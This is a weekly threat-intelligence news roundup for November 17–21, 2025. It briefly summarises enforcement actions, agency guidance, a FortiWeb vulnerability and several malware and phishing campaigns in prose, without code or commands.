Cyware Weekly Threat Intelligence, November 17–21, 2025

The Good

Authorities are taking aim at the backbone of the cybercriminal economy, from resilient server infrastructure to illicit financial flows. CISA has released a new guide to help organizations dismantle bulletproof hosting services, which provide the safe havens necessary for ransomware and malware operations. Meanwhile, a Europol-led operation struck a major blow against digital piracy, identifying 69 suspect sites and disrupting $55 million in cryptocurrency linked to illegal streaming networks.

1. The CISA released a new guide addressing the threat posed by bulletproof hosting (BPH) services, which are increasingly utilized by cybercriminals for activities such as ransomware, phishing, and malware distribution. Recommendations include identifying malicious resources, improving traffic visibility, using targeted filters, and sharing threat intelligence across sectors. CISA emphasizes the importance of automated blocklist reviews, network-edge filters, and feedback processes to reduce accidental blocking. ISPs are encouraged to notify customers of threats, provide filtering tools, and establish standards to prevent BPH abuse.

2. A coordinated enforcement operation led by Europol, in collaboration with the European Union Intellectual Property Office and Spain’s National Police, targeted online intellectual property violations, resulting in the identification of 69 suspect sites and the disruption of $55 million in cryptocurrency linked to piracy. This initiative, known as Intellectual Property Crime Cyber-Patrol Week, utilized advanced open-source intelligence methods and involved over 30 investigators. By purchasing illegal services using cryptocurrency, authorities were able to trace transactions and disrupt revenue streams supporting criminal activities. The operation also facilitated international cooperation, with contributions from more than 15 countries, enhancing the collective response to the evolving challenges of digital piracy and illegal streaming services across Europe.

3. ENISA has achieved a significant milestone by becoming a CVE Root within the global CVE Program, enhancing its role in coordinating vulnerability management across Europe. This designation allows ENISA to assign CVE Identifiers and publish CVE Records for vulnerabilities reported to EU CSIRTs. The agency will also guide manufacturers on compliance with the Cyber Resilience Act and contribute to the European Vulnerability Database.

The Bad

The UNC2891 group has been caught running a sophisticated multi-year ATM fraud campaign targeting Indonesian banks. It physically implanted small computers into ATMs and deployed the CAKETAP malware. An updated .NET loader is using advanced steganography to conceal the Lokibot malware inside seemingly harmless image files to evade detection. Attackers are digging deep into the computing history books to find new weapons. A decades-old Finger protocol, originally for Unix systems, is now being exploited in ClickFix malware attacks.

1. Cybersecurity researchers have uncovered a multi-year ATM fraud campaign by the UNC2891 group, targeting two Indonesian banks through sophisticated methods. This operation involved recruiting money mules, creating cloned cards, and using Raspberry Pi devices to infiltrate ATMs. The group executed multiple attacks, employing advanced malware like CAKETAP to manipulate ATM transaction processes and bypass PIN verification. Persistent access was achieved via custom backdoors and various communication methods, including DNS tunneling. To cover their tracks, UNC2891 utilized anti-forensic tools to erase evidence and disguised their malware to evade detection. 

2. In a sophisticated global malvertising effort known as TamperedChef, cybercriminals are exploiting fake software installers to deploy JavaScript malware that provides remote access to compromised systems. This campaign relies heavily on social engineering tactics, utilizing familiar application names and optimizing search engine results to lure unsuspecting users into downloading malicious software. The attackers enhance the credibility of their counterfeit applications by signing them with code-signing certificates obtained from shell companies. Once installed, the malware establishes a backdoor to gather machine metadata, potentially leading to advertising fraud or data theft. Sectors such as healthcare, construction, and manufacturing have been particularly hard-hit, with a notable concentration of infections in the U.S. Users searching for product manuals online are especially at risk.

3. An updated .NET steganography loader has emerged, utilizing advanced evasion techniques to deliver Lokibot malware. This loader disguises itself as legitimate documents, employing steganography to conceal malicious payloads within image files. It features a module that decrypts and loads additional components at runtime, complicating static detection efforts. The Splunk Threat Research Team successfully extracted hidden payloads using their PixDig tool, revealing Lokibot, an information-stealer targeting Windows and Android systems. Lokibot harvests sensitive data, including credentials and cryptocurrency wallets, while employing various tactics from the MITRE ATT&CK framework. It manipulates access tokens for elevated privileges, injects itself into processes to evade detection, and creates scheduled tasks for persistence.

4. Fortinet has revealed a medium-severity vulnerability in its FortiWeb product, tracked as CVE-2025-58034, which has already been exploited in the wild. This vulnerability, rated with a CVSS score of 6.7, allows authenticated attackers to execute unauthorized operating system commands through specially crafted HTTP requests or CLI commands. Successful exploitation necessitates prior authentication, which attackers can chain with this vulnerability to gain further access. Fortinet has released patches for several affected versions of FortiWeb, emphasizing the importance of updating to the latest versions to mitigate the risk. 

5. The decades-old Finger protocol, originally designed for retrieving user information on Unix and Linux systems, is being exploited in ClickFix malware attacks to execute commands on Windows devices. Threat actors are utilizing this protocol to deliver malicious scripts by tricking users into running commands that retrieve and execute harmful payloads. Recent campaigns have seen attackers impersonate verification prompts, luring victims into executing commands that download malware disguised as legitimate files. These tactics include using the 'finger' command to fetch and run scripts, which can lead to the installation of remote access tools like the NetSupport Manager RAT. 

New Threats

China-linked APT24 hackers have been deploying a stealthy new malware called BadAudio in a massive espionage campaign. A new campaign is targeting Brazilian users with a WhatsApp worm that spreads the Eternidade Stealer. Once installed, it lies in wait for users to open banking or crypto apps to steal their sensitive financial data. A new phishing kit called Sneaky 2FA is using Browser-in-the-Browser technology to create realistic fake windows that trick users into handing over their Microsoft account details.

1. China-linked APT24 hackers have been using the previously undocumented BadAudio malware in a three-year espionage campaign targeting Windows systems. Since 2022, they have employed various methods, including spearphishing, supply-chain compromises, and watering hole attacks, to deliver the malware. APT24 compromised over 20 legitimate websites to inject malicious JavaScript, luring visitors into downloading BadAudio through fake software update prompts. Additionally, they exploited a digital marketing company in Taiwan, injecting malicious code into widely used libraries, affecting over 1,000 domains. The malware is heavily obfuscated, utilizing techniques like DLL search order hijacking to evade detection. Once activated, BadAudio collects system information and communicates with a C2 server to download further payloads.

2. A new Android banking trojan named Sturnus has been targeting encrypted messaging platforms such as Signal, WhatsApp, and Telegram. This malware is capable of capturing messages after they are decrypted, allowing attackers to access private conversations. Sturnus employs advanced encryption methods for communication with its C2 server and exploits Android's Accessibility services to monitor user activity in real time. Infection typically occurs through malicious APK files disguised as legitimate applications. Once installed, Sturnus gains extensive control over the device, including the ability to implement fake overlays that conceal its actions, such as transferring money or approving transactions. 

3. A new cyber campaign is targeting Brazilian users through a WhatsApp worm that distributes the Delphi-based banking trojan, Eternidade Stealer. This malware utilizes a Python script to hijack WhatsApp accounts and send malicious attachments to victims’ contacts. The attack begins with an obfuscated Visual Basic Script that drops a batch script, leading to the deployment of the trojan. Eternidade Stealer scans for strings related to banking applications and cryptocurrency wallets, activating only when these apps are opened. It communicates with C2 servers using email tactics for updates and persistence, enabling attackers to record keystrokes, capture screenshots, and steal sensitive files. 

4. PlushDaemon, a China-aligned cyber threat actor, has been using a new Go-based backdoor called EdgeStepper to conduct adversary-in-the-middle (AitM) attacks by hijacking DNS queries. This malware redirects legitimate software update traffic to malicious servers, enabling the deployment of harmful payloads like LittleDaemon, which subsequently downloads the more advanced SlowStepper backdoor. Active since at least 2018, PlushDaemon has targeted various sectors, including semiconductor, automotive, and electronics companies, across multiple countries including the U.S. and South Korea. SlowStepper is particularly versatile, capable of gathering system information, extracting credentials, and executing commands, making it a significant threat in global cyber espionage efforts.

5. A new phishing kit known as Sneaky 2FA has integrated Browser-in-the-Browser (BitB) functionality to enhance its attacks on Microsoft account credentials. This technique creates realistic pop-up windows that mimic legitimate login pages, effectively deceiving users into entering their information. The attackers employ bot protection measures, such as CAPTCHA and Cloudflare Turnstile, to filter out security tools and target specific victims. Additionally, they utilize conditional loading and obfuscation techniques to evade detection. Research indicates that these threat actors also exploit vulnerabilities in passkey authentication systems through malicious browser extensions, allowing them to intercept and manipulate login processes. 

6. Cybersecurity researchers have uncovered a new malware campaign known as EVALUSION, which utilizes the ClickFix social engineering tactic to distribute Amatera Stealer and NetSupport RAT. First identified in June, Amatera is an evolution of the ACR Stealer and is sold through subscription plans. This malware targets sensitive data from crypto-wallets, browsers, and messaging applications while employing sophisticated evasion techniques to bypass security measures. Victims are tricked into executing malicious commands via fake reCAPTCHA checks, leading to the download of a .NET payload. The Amatera DLL is injected into the "MSBuild.exe" process to harvest data and potentially deploy NetSupport RAT based on the victim's system attributes. 

7. Dragon Breath employs RONINGLOADER to deploy a modified Gh0st RAT, targeting Chinese-speaking users using trojanized NSIS installers. The malware utilizes advanced evasion techniques to disable endpoint security tools, including Microsoft Defender and Qihoo 360 Total Security. RONINGLOADER executes complex actions, such as tampering with system processes, injecting shellcode, and leveraging signed drivers to terminate security processes. The loader bypasses User Account Control (UAC) and manipulates firewall settings to block security software connections. Gh0st RAT enables remote control of infected systems, including registry modifications, event log clearing, keystroke capturing, and payload execution.